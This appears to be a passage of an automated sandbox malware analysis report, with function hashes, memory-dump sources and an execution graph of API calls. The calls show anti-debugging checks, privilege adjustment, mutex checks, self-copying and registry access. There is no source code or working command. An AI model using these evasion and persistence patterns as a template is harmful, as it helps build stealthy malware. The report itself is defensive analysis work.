                                                                                        • Opcode ID: 67afa348da8c63f24607afe3098ca8c9d340cb2bd9af6d5e063a91c92265a85d
                                                                                        • Instruction ID: 219cd4253988e56f12b2ca51bad809191a2f87e80cbf6ee22674acc71f1f8ee3
                                                                                        • Opcode Fuzzy Hash: 67afa348da8c63f24607afe3098ca8c9d340cb2bd9af6d5e063a91c92265a85d
                                                                                        • Instruction Fuzzy Hash: 50018F7272568086EB80CB26F54074A6360FB88FC8F495016EF5947B48DF39C9948B04
                                                                                        Function 08B8C0A9 Relevance: 6.0, APIs: 4, Instructions: 19COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3342764004.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_8b70000_explorer.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_error_mode
                                                                                        • String ID:
                                                                                        • API String ID: 1949149715-0
                                                                                        • Opcode ID: 0d690f4aac3dde16e4e1d2979cb692e4d2a19a8b670458b09341603328327a1b
                                                                                        • Instruction ID: e023d0764712d3e5f538c8d6aa4cba9fc6dfdde66fa4237ce7ff744cb0f473cf
                                                                                        • Opcode Fuzzy Hash: 0d690f4aac3dde16e4e1d2979cb692e4d2a19a8b670458b09341603328327a1b
                                                                                        • Instruction Fuzzy Hash: 40D05E64580106C2FAA93AA44AB133D3855DB4A387F5024BEC612C53E0D90D4486C333
                                                                                        Function 10A66EB0 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 10A50000, based on PE: true
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A98000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.3352603162.0000000010A9B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_10a50000_explorer.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$CriticalEnterSectionmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3605230531-0
                                                                                        • Opcode ID: c8381834cbd1a72aa57a999ab2c84c912f09ae11d85ede2d894aa626384c7661
                                                                                        • Instruction ID: df4356fda98a0cba32fac87a2f1c741cbf21219c4981b9712b08dd914f120ee1
                                                                                        • Opcode Fuzzy Hash: c8381834cbd1a72aa57a999ab2c84c912f09ae11d85ede2d894aa626384c7661
                                                                                        • Instruction Fuzzy Hash: D421C477B58F84CEE7058F24E8947DC2BA0FFA9BC8F490026D64947A90DE64C9C5C741

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.3%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:1133
                                                                                        Total number of Limit Nodes:19
                                                                                        execution_graph 19012 7ff60e6336b0 19050 7ff60e63a198 GetStartupInfoW 19012->19050 19014 7ff60e6336c4 19051 7ff60e636bd0 GetProcessHeap 19014->19051 19016 7ff60e633724 19017 7ff60e63374a 19016->19017 19018 7ff60e633736 19016->19018 19019 7ff60e633731 19016->19019 19052 7ff60e635890 19017->19052 19148 7ff60e6338b4 19018->19148 19139 7ff60e633840 19019->19139 19026 7ff60e63375c 19029 7ff60e633840 _FF_MSGBANNER 68 API calls 19026->19029 19027 7ff60e633761 19028 7ff60e6338b4 _NMSG_WRITE 68 API calls 19027->19028 19030 7ff60e63376b 19028->19030 19029->19027 19032 7ff60e633e08 _mtinitlocknum 3 API calls 19030->19032 19031 7ff60e633775 _ioinit0 _RTC_Initialize 19033 7ff60e633780 GetCommandLineW 19031->19033 19032->19031 19067 7ff60e63a010 GetEnvironmentStringsW 19033->19067 19038 7ff60e6337ac 19080 7ff60e639d68 19038->19080 19042 7ff60e6337bf 19097 7ff60e633e68 19042->19097 19043 7ff60e633e20 __updatetmbcinfo 68 API calls 19043->19042 19045 7ff60e6337c9 19046 7ff60e6337d4 19045->19046 19047 7ff60e633e20 __updatetmbcinfo 68 API calls 19045->19047 19103 7ff60e62fba0 19046->19103 19047->19046 19050->19014 19051->19016 19198 7ff60e633f24 EncodePointer 19052->19198 19054 7ff60e63589b 19201 7ff60e63ae00 19054->19201 19056 7ff60e6358a0 19057 7ff60e635902 19056->19057 19060 7ff60e6358bb 19056->19060 19219 7ff60e635910 19057->19219 19205 7ff60e6341d4 19060->19205 19063 7ff60e6358d2 FlsSetValue 19063->19057 19064 7ff60e6358e4 19063->19064 19210 7ff60e6357d4 19064->19210 19068 7ff60e633792 19067->19068 19069 7ff60e63a036 19067->19069 19074 7ff60e639ae0 GetModuleFileNameW 19068->19074 19071 7ff60e634254 _malloc_crt 68 API calls 19069->19071 19073 7ff60e63a058 _copytlocinfo_nolock 19071->19073 19072 7ff60e63a071 FreeEnvironmentStringsW 19072->19068 19073->19072 19075 7ff60e639b20 wparse_cmdline 19074->19075 19076 7ff60e63379e 19075->19076 19077 7ff60e639b7b 19075->19077 19076->19038 19191 7ff60e633e20 19076->19191 19078 7ff60e634254 _malloc_crt 68 API calls 19077->19078 19079 7ff60e639b80 wparse_cmdline 19078->19079 19079->19076 19081 7ff60e639d9b __get_qualified_locale 19080->19081 19082 7ff60e6337b1 19080->19082 19083 7ff60e639dbb 19081->19083 19082->19042 19082->19043 19084 7ff60e6341d4 _calloc_crt 68 API calls 19083->19084 19085 7ff60e639dcb __get_qualified_locale 19084->19085 19085->19082 19088 7ff60e6341d4 _calloc_crt 68 API calls 19085->19088 19089 7ff60e639e33 19085->19089 19090 7ff60e639e73 19085->19090 19094 7ff60e639e8b 19085->19094 19304 7ff60e63a34c 19085->19304 19086 7ff60e63240c free 68 API calls 19087 7ff60e639e42 19086->19087 19087->19082 19088->19085 19089->19086 19091 7ff60e63240c free 68 API calls 19090->19091 19093 7ff60e639e7f 19091->19093 19093->19082 19313 7ff60e6347c0 19094->19313 19098 7ff60e633e7e _IsNonwritableInCurrentImage 19097->19098 19339 7ff60e63af50 19098->19339 19100 7ff60e633e9b _initterm_e 19102 7ff60e633ebe _IsNonwritableInCurrentImage 19100->19102 19342 7ff60e631790 19100->19342 19102->19045 19359 7ff60e62e000 19103->19359 19108 7ff60e62fbcc ExitProcess 19109 7ff60e62fbd4 19593 7ff60e63060c GetCurrentProcess OpenProcessToken 19109->19593 19113 7ff60e62fbef 19114 7ff60e62fc08 19113->19114 19115 7ff60e62fce1 19113->19115 19608 7ff60e630740 CreateMutexA 19114->19608 19620 7ff60e630798 19115->19620 19120 7ff60e62fc1b ExitProcess 19121 7ff60e62fc23 CreateThread CreateThread CreateThread CreateThread 19612 7ff60e6301a8 19121->19612 19125 7ff60e62fcc0 19129 7ff60e62fcc7 Sleep 19125->19129 19130 7ff60e62fcd4 ExitProcess 19125->19130 19126 7ff60e62fcfa 19128 7ff60e630740 3 API calls 19126->19128 19127 7ff60e62fda2 19631 7ff60e6134f0 19127->19631 19132 7ff60e62fd06 19128->19132 19129->19125 19134 7ff60e62fd0d ExitProcess 19132->19134 19135 7ff60e62fd15 CreateThread CreateThread CreateThread 19132->19135 19136 7ff60e62fd84 19135->19136 19137 7ff60e62fd98 ExitProcess 19136->19137 19138 7ff60e62fd8b Sleep 19136->19138 19138->19136 20388 7ff60e639ea8 19139->20388 19142 7ff60e639ea8 _set_error_mode 68 API calls 19144 7ff60e63385d 19142->19144 19143 7ff60e6338b4 _NMSG_WRITE 68 API calls 19145 7ff60e633874 19143->19145 19144->19143 19146 7ff60e63387e 19144->19146 19147 7ff60e6338b4 _NMSG_WRITE 68 API calls 19145->19147 19146->19018 19147->19146 19149 7ff60e6338e8 _NMSG_WRITE 19148->19149 19150 7ff60e639ea8 _set_error_mode 65 API calls 19149->19150 19187 7ff60e633a22 19149->19187 19153 7ff60e6338fe 19150->19153 19154 7ff60e633a24 GetStdHandle 19153->19154 19155 7ff60e639ea8 _set_error_mode 65 API calls 19153->19155 19158 7ff60e633a3c _output_s_l 19154->19158 19154->19187 19156 7ff60e63390f 19155->19156 19156->19154 19157 7ff60e633920 19156->19157 19159 7ff60e63a34c _expandlocale 65 API calls 19157->19159 19157->19187 19160 7ff60e633a74 WriteFile 19158->19160 19161 7ff60e63394b 19159->19161 19160->19187 19162 7ff60e633b0f 19161->19162 19163 7ff60e633955 GetModuleFileNameW 19161->19163 19165 7ff60e6347c0 _invoke_watson 15 API calls 19162->19165 19164 7ff60e63397a 19163->19164 19171 7ff60e633993 __get_qualified_locale 19163->19171 19166 7ff60e63a34c _expandlocale 65 API calls 19164->19166 19167 7ff60e633b22 19165->19167 19168 7ff60e63398b 19166->19168 19169 7ff60e633abc 19168->19169 19168->19171 19172 7ff60e6347c0 _invoke_watson 15 API calls 19169->19172 19170 7ff60e6339dd 20403 7ff60e63a2c4 19170->20403 19171->19170 20394 7ff60e63a3d4 19171->20394 19175 7ff60e633ad0 19172->19175 19179 7ff60e6347c0 _invoke_watson 15 API calls 19175->19179 19176 7ff60e633afa 19180 7ff60e6347c0 _invoke_watson 15 API calls 19176->19180 19178 7ff60e63a2c4 _NMSG_WRITE 65 API calls 19182 7ff60e633a05 19178->19182 19183 7ff60e633ae5 19179->19183 19180->19162 19182->19183 19184 7ff60e633a0d 19182->19184 19186 7ff60e6347c0 _invoke_watson 15 API calls 19183->19186 20412 7ff60e63a4a0 EncodePointer 19184->20412 19186->19176 20437 7ff60e636bb0 19187->20437 19188 7ff60e633e08 20459 7ff60e633dc4 GetModuleHandleExW 19188->20459 19192 7ff60e633840 _FF_MSGBANNER 68 API calls 19191->19192 19193 7ff60e633e2d 19192->19193 19194 7ff60e6338b4 _NMSG_WRITE 68 API calls 19193->19194 19195 7ff60e633e34 19194->19195 20462 7ff60e633ff4 19195->20462 19199 7ff60e633f3d _init_pointers 19198->19199 19200 7ff60e638104 EncodePointer 19199->19200 19200->19054 19202 7ff60e63ae1b 19201->19202 19203 7ff60e63ae21 InitializeCriticalSectionAndSpinCount 19202->19203 19204 7ff60e63ae4c 19202->19204 19203->19202 19204->19056 19207 7ff60e6341f9 19205->19207 19208 7ff60e634236 19207->19208 19209 7ff60e634217 Sleep 19207->19209 19226 7ff60e63af94 19207->19226 19208->19057 19208->19063 19209->19207 19209->19208 19256 7ff60e63ac78 19210->19256 19220 7ff60e63591f 19219->19220 19221 7ff60e63acec DeleteCriticalSection 19220->19221 19222 7ff60e63ad0a 19220->19222 19223 7ff60e63240c free 68 API calls 19221->19223 19224 7ff60e63374f 19222->19224 19225 7ff60e63ad1f DeleteCriticalSection 19222->19225 19223->19220 19224->19026 19224->19027 19224->19031 19225->19222 19227 7ff60e63afa9 19226->19227 19232 7ff60e63afc6 19226->19232 19228 7ff60e63afb7 19227->19228 19227->19232 19234 7ff60e6359a4 19228->19234 19230 7ff60e63afde HeapAlloc 19231 7ff60e63afbc 19230->19231 19230->19232 19231->19207 19232->19230 19232->19231 19237 7ff60e633d88 DecodePointer 19232->19237 19239 7ff60e635750 GetLastError 19234->19239 19236 7ff60e6359ad 19236->19231 19238 7ff60e633da3 19237->19238 19238->19232 19241 7ff60e63576d 19239->19241 19240 7ff60e6357bc SetLastError 19240->19236 19241->19240 19242 7ff60e6341d4 _calloc_crt 65 API calls 19241->19242 19243 7ff60e635782 19242->19243 19243->19240 19244 7ff60e63579f 19243->19244 19245 7ff60e6357b5 19243->19245 19247 7ff60e6357d4 _initptd 65 API calls 19244->19247 19250 7ff60e63240c 19245->19250 19249 7ff60e6357a6 GetCurrentThreadId 19247->19249 19248 7ff60e6357ba 19248->19240 19249->19240 19251 7ff60e632411 HeapFree 19250->19251 19253 7ff60e632441 realloc 19250->19253 19252 7ff60e63242c 19251->19252 19251->19253 19254 7ff60e6359a4 _errno 66 API calls 19252->19254 19253->19248 19255 7ff60e632431 GetLastError 19254->19255 19255->19253 19257 7ff60e63aca7 EnterCriticalSection 19256->19257 19258 7ff60e63ac96 19256->19258 19262 7ff60e63ad44 19258->19262 19261 7ff60e633e20 __updatetmbcinfo 67 API calls 19261->19257 19263 7ff60e63ad7a 19262->19263 19264 7ff60e63ad61 19262->19264 19267 7ff60e63ac9b 19263->19267 19283 7ff60e634254 19263->19283 19265 7ff60e633840 _FF_MSGBANNER 66 API calls 19264->19265 19266 7ff60e63ad66 19265->19266 19270 7ff60e6338b4 _NMSG_WRITE 66 API calls 19266->19270 19267->19257 19267->19261 19273 7ff60e63ad70 19270->19273 19271 7ff60e63ada4 19274 7ff60e6359a4 _errno 66 API calls 19271->19274 19272 7ff60e63adb3 19275 7ff60e63ac78 _lock 66 API calls 19272->19275 19276 7ff60e633e08 _mtinitlocknum 3 API calls 19273->19276 19274->19267 19277 7ff60e63adbd 19275->19277 19276->19263 19278 7ff60e63add9 19277->19278 19279 7ff60e63adc8 InitializeCriticalSectionAndSpinCount 19277->19279 19281 7ff60e63240c free 66 API calls 19278->19281 19280 7ff60e63addf LeaveCriticalSection 19279->19280 19280->19267 19282 7ff60e63adde 19281->19282 19282->19280 19284 7ff60e63427c 19283->19284 19286 7ff60e6342b1 19284->19286 19287 7ff60e634290 Sleep 19284->19287 19288 7ff60e63244c 19284->19288 19286->19271 19286->19272 19287->19284 19287->19286 19289 7ff60e6324e0 19288->19289 19290 7ff60e632464 19288->19290 19291 7ff60e633d88 _callnewh DecodePointer 19289->19291 19292 7ff60e63249c HeapAlloc 19290->19292 19294 7ff60e633840 _FF_MSGBANNER 67 API calls 19290->19294 19297 7ff60e6324c5 19290->19297 19298 7ff60e633d88 _callnewh DecodePointer 19290->19298 19300 7ff60e6338b4 _NMSG_WRITE 67 API calls 19290->19300 19301 7ff60e6324ca 19290->19301 19302 7ff60e633e08 _mtinitlocknum 3 API calls 19290->19302 19293 7ff60e6324e5 19291->19293 19292->19290 19296 7ff60e6324d5 19292->19296 19295 7ff60e6359a4 _errno 67 API calls 19293->19295 19294->19290 19295->19296 19296->19284 19299 7ff60e6359a4 _errno 67 API calls 19297->19299 19298->19290 19299->19301 19300->19290 19303 7ff60e6359a4 _errno 67 API calls 19301->19303 19302->19290 19303->19296 19305 7ff60e63a35a 19304->19305 19307 7ff60e63a364 19304->19307 19305->19307 19311 7ff60e63a381 19305->19311 19306 7ff60e6359a4 _errno 68 API calls 19308 7ff60e63a36d 19306->19308 19307->19306 19318 7ff60e6347a0 19308->19318 19310 7ff60e63a379 19310->19085 19311->19310 19312 7ff60e6359a4 _errno 68 API calls 19311->19312 19312->19308 19314 7ff60e6347ce 19313->19314 19327 7ff60e63463c 19314->19327 19321 7ff60e634738 DecodePointer 19318->19321 19322 7ff60e634776 19321->19322 19323 7ff60e6347c0 _invoke_watson 15 API calls 19322->19323 19324 7ff60e63479c 19323->19324 19325 7ff60e634738 _invalid_parameter_noinfo 15 API calls 19324->19325 19326 7ff60e6347b9 19325->19326 19326->19310 19328 7ff60e634677 _call_reportfault _wctomb_s_l 19327->19328 19335 7ff60e63a094 RtlCaptureContext RtlLookupFunctionEntry 19328->19335 19336 7ff60e6346af IsDebuggerPresent 19335->19336 19337 7ff60e63a0c4 RtlVirtualUnwind 19335->19337 19338 7ff60e63a24c SetUnhandledExceptionFilter UnhandledExceptionFilter 19336->19338 19337->19336 19340 7ff60e63af63 EncodePointer 19339->19340 19340->19340 19341 7ff60e63af7e 19340->19341 19341->19100 19345 7ff60e631684 19342->19345 19358 7ff60e633fdc 19345->19358 19663 7ff60e62df78 LoadLibraryA GetProcAddress 19359->19663 19361 7ff60e62e073 19664 7ff60e62df78 LoadLibraryA GetProcAddress 19361->19664 19363 7ff60e62e08d 19665 7ff60e62dfbc LoadLibraryA GetProcAddress 19363->19665 19365 7ff60e62e0a7 19666 7ff60e62dfbc LoadLibraryA GetProcAddress 19365->19666 19367 7ff60e62e0c1 19667 7ff60e62dfbc LoadLibraryA GetProcAddress 19367->19667 19369 7ff60e62e0db 19668 7ff60e62dfbc LoadLibraryA GetProcAddress 19369->19668 19371 7ff60e62e0f5 19669 7ff60e62dfbc LoadLibraryA GetProcAddress 19371->19669 19373 7ff60e62e10f 19670 7ff60e62dfbc LoadLibraryA GetProcAddress 19373->19670 19375 7ff60e62e129 19671 7ff60e62dfbc LoadLibraryA GetProcAddress 19375->19671 19377 7ff60e62e143 19672 7ff60e62dfbc LoadLibraryA GetProcAddress 19377->19672 19379 7ff60e62e15d 19673 7ff60e62dfbc LoadLibraryA GetProcAddress 19379->19673 19381 7ff60e62e177 19674 7ff60e62df78 LoadLibraryA GetProcAddress 19381->19674 19383 7ff60e62e191 19675 7ff60e62df78 LoadLibraryA GetProcAddress 19383->19675 19385 7ff60e62e1ab 19676 7ff60e62df78 LoadLibraryA GetProcAddress 19385->19676 19387 7ff60e62e1c5 19677 7ff60e62df78 LoadLibraryA GetProcAddress 19387->19677 19389 7ff60e62e1df 19678 7ff60e62dfbc LoadLibraryA GetProcAddress 19389->19678 19391 7ff60e62e1f9 19679 7ff60e62dfbc LoadLibraryA GetProcAddress 19391->19679 19393 7ff60e62e213 19680 7ff60e62dfbc LoadLibraryA GetProcAddress 19393->19680 19395 7ff60e62e22d 19681 7ff60e62dfbc LoadLibraryA GetProcAddress 19395->19681 19397 7ff60e62e247 19682 7ff60e62dfbc LoadLibraryA GetProcAddress 19397->19682 19399 7ff60e62e261 19683 7ff60e62dfbc LoadLibraryA GetProcAddress 19399->19683 19401 7ff60e62e27b 19684 7ff60e62dfbc LoadLibraryA GetProcAddress 19401->19684 19403 7ff60e62e295 19685 7ff60e62dfbc LoadLibraryA GetProcAddress 19403->19685 19405 7ff60e62e2af 19686 7ff60e62dfbc LoadLibraryA GetProcAddress 19405->19686 19407 7ff60e62e2c9 19687 7ff60e62dfbc LoadLibraryA GetProcAddress 19407->19687 19409 7ff60e62e2e3 19688 7ff60e62dfbc LoadLibraryA GetProcAddress 19409->19688 19411 7ff60e62e2fd 19689 7ff60e62dfbc LoadLibraryA GetProcAddress 19411->19689 19413 7ff60e62e317 19690 7ff60e62dfbc LoadLibraryA GetProcAddress 19413->19690 19415 7ff60e62e331 19691 7ff60e62dfbc LoadLibraryA GetProcAddress 19415->19691 19417 7ff60e62e34b 19692 7ff60e62dfbc LoadLibraryA GetProcAddress 19417->19692 19419 7ff60e62e365 19693 7ff60e62dfbc LoadLibraryA GetProcAddress 19419->19693 19421 7ff60e62e37f 19694 7ff60e62dfbc LoadLibraryA GetProcAddress 19421->19694 19423 7ff60e62e399 19695 7ff60e62dfbc LoadLibraryA GetProcAddress 19423->19695 19425 7ff60e62e3b3 19696 7ff60e62dfbc LoadLibraryA GetProcAddress 19425->19696 19427 7ff60e62e3cd 19697 7ff60e62dfbc LoadLibraryA GetProcAddress 19427->19697 19429 7ff60e62e3e7 19698 7ff60e62dfbc LoadLibraryA GetProcAddress 19429->19698 19431 7ff60e62e401 19699 7ff60e62dfbc LoadLibraryA GetProcAddress 19431->19699 19433 7ff60e62e41b 19700 7ff60e62dfbc LoadLibraryA GetProcAddress 19433->19700 19435 7ff60e62e435 19701 7ff60e62dfbc LoadLibraryA GetProcAddress 19435->19701 19437 7ff60e62e44f 19702 7ff60e62dfbc LoadLibraryA GetProcAddress 19437->19702 19439 7ff60e62e469 19703 7ff60e62dfbc LoadLibraryA GetProcAddress 19439->19703 19441 7ff60e62e483 19704 7ff60e62dfbc LoadLibraryA GetProcAddress 19441->19704 19443 7ff60e62e49d 19705 7ff60e62dfbc LoadLibraryA GetProcAddress 19443->19705 19445 7ff60e62e4b7 19706 7ff60e62dfbc LoadLibraryA GetProcAddress 19445->19706 19447 7ff60e62e4d1 19707 7ff60e62dfbc LoadLibraryA GetProcAddress 19447->19707 19449 7ff60e62e4eb 19708 7ff60e62dfbc LoadLibraryA GetProcAddress 19449->19708 19451 7ff60e62e505 19709 7ff60e62dfbc LoadLibraryA GetProcAddress 19451->19709 19453 7ff60e62e51f 19710 7ff60e62dfbc LoadLibraryA GetProcAddress 19453->19710 19455 7ff60e62e539 19711 7ff60e62dfbc LoadLibraryA GetProcAddress 19455->19711 19457 7ff60e62e553 19712 7ff60e62dfbc LoadLibraryA GetProcAddress 19457->19712 19459 7ff60e62e56d 19713 7ff60e62dfbc LoadLibraryA GetProcAddress 19459->19713 19461 7ff60e62e587 19714 7ff60e62dfbc LoadLibraryA GetProcAddress 19461->19714 19463 7ff60e62e5a1 19715 7ff60e62dfbc LoadLibraryA GetProcAddress 19463->19715 19465 7ff60e62e5bb 19716 7ff60e62dfbc LoadLibraryA GetProcAddress 19465->19716 19467 7ff60e62e5d5 19717 7ff60e62dfbc LoadLibraryA GetProcAddress 19467->19717 19469 7ff60e62e5ef 19718 7ff60e62dfbc LoadLibraryA GetProcAddress 19469->19718 19471 7ff60e62e609 19719 7ff60e62dfbc LoadLibraryA GetProcAddress 19471->19719 19473 7ff60e62e623 19720 7ff60e62dfbc LoadLibraryA GetProcAddress 19473->19720 19475 7ff60e62e63d 19721 7ff60e62dfbc LoadLibraryA GetProcAddress 19475->19721 19477 7ff60e62e657 19722 7ff60e62dfbc LoadLibraryA GetProcAddress 19477->19722 19479 7ff60e62e671 19723 7ff60e62dfbc LoadLibraryA GetProcAddress 19479->19723 19481 7ff60e62e68b 19724 7ff60e62dfbc LoadLibraryA GetProcAddress 19481->19724 19483 7ff60e62e6a5 19725 7ff60e62dfbc LoadLibraryA GetProcAddress 19483->19725 19485 7ff60e62e6bf 19726 7ff60e62dfbc LoadLibraryA GetProcAddress 19485->19726 19487 7ff60e62e6d9 19727 7ff60e62dfbc LoadLibraryA GetProcAddress 19487->19727 19489 7ff60e62e6f3 19728 7ff60e62dfbc LoadLibraryA GetProcAddress 19489->19728 19491 7ff60e62e70d 19729 7ff60e62dfbc LoadLibraryA GetProcAddress 19491->19729 19493 7ff60e62e727 19730 7ff60e62dfbc LoadLibraryA GetProcAddress 19493->19730 19495 7ff60e62e741 19731 7ff60e62dfbc LoadLibraryA GetProcAddress 19495->19731 19497 7ff60e62e75b 19732 7ff60e62dfbc LoadLibraryA GetProcAddress 19497->19732 19499 7ff60e62e775 19733 7ff60e62dfbc LoadLibraryA GetProcAddress 19499->19733 19501 7ff60e62e78f 19734 7ff60e62dfbc LoadLibraryA GetProcAddress 19501->19734 19503 7ff60e62e7a9 19735 7ff60e62dfbc LoadLibraryA GetProcAddress 19503->19735 19505 7ff60e62e7c3 19736 7ff60e62dfbc LoadLibraryA GetProcAddress 19505->19736 19507 7ff60e62e7dd 19737 7ff60e62dfbc LoadLibraryA GetProcAddress 19507->19737 19509 7ff60e62e7f7 19738 7ff60e62dfbc LoadLibraryA GetProcAddress 19509->19738 19511 7ff60e62e811 19739 7ff60e62dfbc LoadLibraryA GetProcAddress 19511->19739 19513 7ff60e62e82b 19740 7ff60e62dfbc LoadLibraryA GetProcAddress 19513->19740 19515 7ff60e62e845 19741 7ff60e62dfbc LoadLibraryA GetProcAddress 19515->19741 19517 7ff60e62e85f 19742 7ff60e62dfbc LoadLibraryA GetProcAddress 19517->19742 19519 7ff60e62e879 19743 7ff60e62dfbc LoadLibraryA GetProcAddress 19519->19743 19521 7ff60e62e893 19744 7ff60e62dfbc LoadLibraryA GetProcAddress 19521->19744 19523 7ff60e62e8ad 19745 7ff60e62dfbc LoadLibraryA GetProcAddress 19523->19745 19525 7ff60e62e8c7 19746 7ff60e62dfbc LoadLibraryA GetProcAddress 19525->19746 19527 7ff60e62e8e1 19747 7ff60e62dfbc LoadLibraryA GetProcAddress 19527->19747 19529 7ff60e62e8fb 19748 7ff60e62dfbc LoadLibraryA GetProcAddress 19529->19748 19531 7ff60e62e915 19749 7ff60e62dfbc LoadLibraryA GetProcAddress 19531->19749 19533 7ff60e62e92f 19750 7ff60e62dfbc LoadLibraryA GetProcAddress 19533->19750 19535 7ff60e62e949 19751 7ff60e62dfbc LoadLibraryA GetProcAddress 19535->19751 19537 7ff60e62e963 19752 7ff60e62dfbc LoadLibraryA GetProcAddress 19537->19752 19539 7ff60e62e97d 19753 7ff60e62dfbc LoadLibraryA GetProcAddress 19539->19753 19541 7ff60e62e997 19754 7ff60e62dfbc LoadLibraryA GetProcAddress 19541->19754 19543 7ff60e62e9b1 19755 7ff60e62dfbc LoadLibraryA GetProcAddress 19543->19755 19545 7ff60e62e9cb 19756 7ff60e62dfbc LoadLibraryA GetProcAddress 19545->19756 19547 7ff60e62e9e5 19757 7ff60e62dfbc LoadLibraryA GetProcAddress 19547->19757 19549 7ff60e62e9ff 19758 7ff60e62dfbc LoadLibraryA GetProcAddress 19549->19758 19551 7ff60e62ea19 19759 7ff60e62dfbc LoadLibraryA GetProcAddress 19551->19759 19553 7ff60e62ea33 19760 7ff60e62dfbc LoadLibraryA GetProcAddress 19553->19760 19555 7ff60e62ea4d 19761 7ff60e62dfbc LoadLibraryA GetProcAddress 19555->19761 19557 7ff60e62ea67 19762 7ff60e62df78 LoadLibraryA GetProcAddress 19557->19762 19559 7ff60e62ea81 19763 7ff60e62dfbc LoadLibraryA GetProcAddress 19559->19763 19561 7ff60e62ea9b 19764 7ff60e62dfbc LoadLibraryA GetProcAddress 19561->19764 19563 7ff60e62eab5 19765 7ff60e62dfbc LoadLibraryA GetProcAddress 19563->19765 19565 7ff60e62eacf 19766 7ff60e62dfbc LoadLibraryA GetProcAddress 19565->19766 19567 7ff60e62eae9 19767 7ff60e62dfbc LoadLibraryA GetProcAddress 19567->19767 19569 7ff60e62eb03 19768 7ff60e62dfbc LoadLibraryA GetProcAddress 19569->19768 19571 7ff60e62eb1d 19769 7ff60e62dfbc LoadLibraryA GetProcAddress 19571->19769 19573 7ff60e62eb37 19770 7ff60e62df78 LoadLibraryA GetProcAddress 19573->19770 19575 7ff60e62eb51 19771 7ff60e62df78 LoadLibraryA GetProcAddress 19575->19771 19577 7ff60e62eb6b 19772 7ff60e62dfbc LoadLibraryA GetProcAddress 19577->19772 19579 7ff60e62eb85 19773 7ff60e62dfbc LoadLibraryA GetProcAddress 19579->19773 19581 7ff60e62eb9f 19774 7ff60e62dfbc LoadLibraryA GetProcAddress 19581->19774 19583 7ff60e62ebb9 19775 7ff60e62dfbc LoadLibraryA GetProcAddress 19583->19775 19585 7ff60e62ebd3 19776 7ff60e62dfbc LoadLibraryA GetProcAddress 19585->19776 19587 7ff60e62ebed 19777 7ff60e62dfbc LoadLibraryA GetProcAddress 19587->19777 19589 7ff60e62ec07 19590 7ff60e630150 IsDebuggerPresent 19589->19590 19591 7ff60e62fbc5 19590->19591 19592 7ff60e630162 GetCurrentProcess CheckRemoteDebuggerPresent 19590->19592 19591->19108 19591->19109 19592->19591 19594 7ff60e62fbd9 19593->19594 19595 7ff60e630632 GetTokenInformation 19593->19595 19604 7ff60e6303f4 GetModuleFileNameW 19594->19604 19778 7ff60e6302b0 VirtualAlloc 19595->19778 19597 7ff60e630663 GetTokenInformation 19598 7ff60e6306aa AdjustTokenPrivileges CloseHandle 19597->19598 19599 7ff60e630690 CloseHandle 19597->19599 19779 7ff60e630280 19598->19779 19600 7ff60e630280 VirtualFree 19599->19600 19601 7ff60e6306a5 19600->19601 19601->19594 19605 7ff60e6304b8 wcsncpy 19604->19605 19606 7ff60e63041f PathFindFileNameW wcslen 19604->19606 19607 7ff60e63044d 19605->19607 19606->19607 19607->19113 19609 7ff60e62fc14 19608->19609 19610 7ff60e63076c GetLastError 19608->19610 19609->19120 19609->19121 19610->19609 19611 7ff60e630779 CloseHandle 19610->19611 19611->19609 19782 7ff60e630844 19612->19782 19614 7ff60e6301b8 19785 7ff60e631010 CreateFileW 19614->19785 19617 7ff60e6301f7 19618 7ff60e63020b 19617->19618 19619 7ff60e6301fe Sleep 19617->19619 19618->19125 19619->19617 19621 7ff60e631174 3 API calls 19620->19621 19622 7ff60e6307c3 19621->19622 19623 7ff60e630844 11 API calls 19622->19623 19624 7ff60e6307cd GetModuleFileNameW DeleteFileW CopyFileW 19623->19624 19625 7ff60e62fce6 19624->19625 19626 7ff60e63080f SetFileAttributesW 19624->19626 19629 7ff60e630218 GetVersionExW 19625->19629 19802 7ff60e630f48 RegOpenKeyExW 19626->19802 19630 7ff60e62fcef 19629->19630 19630->19126 19630->19127 19806 7ff60e612314 LoadLibraryA 19631->19806 19636 7ff60e61352f GetModuleFileNameW 19821 7ff60e6122bc 19636->19821 19637 7ff60e613525 ExitProcess 19640 7ff60e6135f6 19857 7ff60e613aa8 19640->19857 19641 7ff60e6135ba CreateFileW 19642 7ff60e61366b 19641->19642 19825 7ff60e612058 CreateFileMappingW 19642->19825 19644 7ff60e613610 19862 7ff60e613cd4 19644->19862 19649 7ff60e6136e7 19653 7ff60e612f38 6 API calls 19649->19653 19650 7ff60e6136a9 CloseHandle 19832 7ff60e612d60 GetTempPathW GetTempFileNameW 19650->19832 19656 7ff60e6136f6 CloseHandle 19653->19656 19659 7ff60e6136e0 19656->19659 19844 7ff60e612fdc 19659->19844 19663->19361 19664->19363 19665->19365 19666->19367 19667->19369 19668->19371 19669->19373 19670->19375 19671->19377 19672->19379 19673->19381 19674->19383 19675->19385 19676->19387 19677->19389 19678->19391 19679->19393 19680->19395 19681->19397 19682->19399 19683->19401 19684->19403 19685->19405 19686->19407 19687->19409 19688->19411 19689->19413 19690->19415 19691->19417 19692->19419 19693->19421 19694->19423 19695->19425 19696->19427 19697->19429 19698->19431 19699->19433 19700->19435 19701->19437 19702->19439 19703->19441 19704->19443 19705->19445 19706->19447 19707->19449 19708->19451 19709->19453 19710->19455 19711->19457 19712->19459 19713->19461 19714->19463 19715->19465 19716->19467 19717->19469 19718->19471 19719->19473 